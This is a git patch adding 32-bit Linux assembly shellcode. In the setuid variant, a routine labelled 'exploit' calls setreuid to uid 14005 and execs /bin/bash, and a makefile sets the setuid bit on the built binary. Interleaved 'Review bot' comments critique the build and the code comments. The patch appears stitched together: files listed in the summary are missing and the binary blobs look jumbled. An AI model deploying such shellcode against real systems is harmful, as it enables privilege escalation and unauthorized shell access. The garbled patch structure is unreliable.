From 0c7b4ed75157aa9d781e4eec92a0a604c4c45c9c Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Fri, 20 Nov 2020 17:57:20 -0600
Subject: [PATCH] new file: exec_cmd/makefile new file: exec_cmd/shell new file: exec_cmd/shell.asm new file: exec_cmd/shell.o new file: exec_cmd_setuid/makefile new file: exec_cmd_setuid/shell new file: exec_cmd_setuid/shell.asm new file: exec_cmd_setuid/shell.o
---
 exec_cmd/makefile | 5 +++++
 exec_cmd/shell | Bin 0 -> 4268 bytes
 exec_cmd/shell.asm | 19 +++++++++++++++++++
 exec_cmd/shell.o | Bin 0 -> 528 bytes
 exec_cmd_setuid/makefile | 5 +++++
 exec_cmd_setuid/shell | Bin 0 -> 4288 bytes
 exec_cmd_setuid/shell.asm | 28 ++++++++++++++++++++++++++++
 exec_cmd_setuid/shell.o | Bin 0 -> 592 bytes
 8 files changed, 57 insertions(+)
 create mode 100644 exec_cmd/makefile
 create mode 100755 exec_cmd/shell
 create mode 100644 exec_cmd/shell.asm
 create mode 100644 exec_cmd/shell.o
 create mode 100644 exec_cmd_setuid/makefile
 create mode 100755 exec_cmd_setuid/shell
 create mode 100644 exec_cmd_setuid/shell.asm
 create mode 100644 exec_cmd_setuid/shell.o
diff --git a/exec_cmd/makefile b/exec_cmd/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd/makefile
@@ -0,0 +1,5 @@
+make:
+ nasm shell.asm -felf32 -o shell.o
+ ld -m elf_i386 shell.o -o shell -s
+ chmod u+s shell
+
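Review bot: `chmod u+s shell` does not belong in the build recipe: it marks whatever `ld` just produced as setuid for the user who ran make, so a build run as root leaves a root-setuid launcher in the working tree, and since git stores only the executable bit the committed `shell` (mode 100755 in the diffstat) cannot carry the setuid bit anyway. Keep this target to the `nasm` and `ld` lines and put the privilege step in a separate, explicitly invoked install target that a default build never runs. The `shell` and `shell.o` files listed in the diffstat for both directories are build outputs and should be ignored rather than committed. The target is also named `make:` rather than the conventional `all:`, and the recipe lines must be tab-indented, which this collapsed view cannot confirm.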
diff --git a/exec_cmd/shell b/exec_cmd/shell
new file mode 100755
index 0000000000000000000000000000000000000000..9ea0d3b1ae343d767ca7c9dd05979479da3a3592
GIT binary patch
literal 4268
zcmb<-^>JflWMqH=CI)5(FmD12hY3*7L;xaV!l1yw#GnC`WrE0qgd12mK)3|R1Ys7C z7*IV}KS&?Y3=mcVGC`OXh(YqBU^E0qLtr!nMnhmU1V%$(Gz3ONU^E0qLtr!nMnhmU z1V%%Ez9H~h$nb#SZNrmMolaaExH~T!UOLJflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBXgk*vMl+6yL znUTaDfa(;H_#iVtKoE$LT~Yv)C;*DF05Ql85DhX@5{Qw_djM3Y3>1R_n0YY%Yazn} zhPMq*Ms+%IZQ$;_Yy|Nqxd%FNSGN-WNRsf5ycC8-r940^>G#U({0iAg|K zWiEt<@X?f`bCK<5VfgqTSsoMJflWMqH=CI)5(FmD12hY3*7LjWRU!l1yw#GnC`WrE0qgd12mK)3|R1Ys7C z7*IV}KS&?Y3=lR4GC`OXh(YqBU^E0qLtr!nMnhmU1V%$(Gz3ONU^E0qLtr!nMnhmU z1V%%Ez9H~h-SCp(0mIvdCpVl<+r8B+ZRb|AvkefDs7@!Y4cxo+fL-{r4KJ?z|Nmb< zDKk$$DX}<%L9aNYxTL5gF^NI1B((z6`zH=?1C@cs2iQQ$LE{6!@c_`+01Uu}2S93= SVS+%~94H}(#0QTt0QmrHoGE1h
literal 0
HcmV?d00001
diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm
new file mode 100644
index 0000000..504685f
--- /dev/null
+++ b/exec_cmd_setuid/shell.asm
@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start
+cmd: db '/bin/bash'
diff --git a/exec_cmd_setuid/shell.o b/exec_cmd_setuid/shell.o
new file mode 100644
index 0000000000000000000000000000000000000000..59be32714228dab7d9729a24b586cf650ba3a6e3
GIT binary patch
literal 592
zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpJY7?@y6Nuoh!f-oCYmjRGtj%0!Wl+6yL znUTZ`fa3>1R_n0bmo0Zy18 zkahs7;{ehiy&yFp^FaL9>V}sL4;bDyJh|a?+U~7pX*;)?oo#@KM0GlGZQ$Om2UK>p z;l-8z|NrYJW#;K8B^GA@g`hyMB(#38V!;J}u5j&B@VAEY4+! lFD^+eDq%>iD9FjrEMZ7VEJ
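Review bot: The syscall numbers and the uid in the exec_cmd_setuid/shell.asm hunk are bare magic numbers and the file has no header stating its target, so `203`, `11` and `14005` should be named `equ` constants (`SYS_SETREUID32 equ 203`, `SYS_EXECVE equ 11`, `TARGET_UID equ 14005`) under a header comment giving the ABI (32-bit Linux, `int 0x80`, eax = number, args in ebx/ecx/edx) and the C-equivalent calls, `setreuid(TARGET_UID, TARGET_UID)` followed by `execve(cmd, ...)`. The comment on `call exploit` says control 'jmps to start', but the call target is `exploit`, not `_start`; `; push the address of cmd (the string below) and continue at exploit` is what the instruction does. The `; set reuid` comment sits on `xor eax, eax` rather than on the `int 0x80` that issues the call; moving it to that syscall line and adding `; execve` on the second `int 0x80` makes the two syscalls readable without a table lookup.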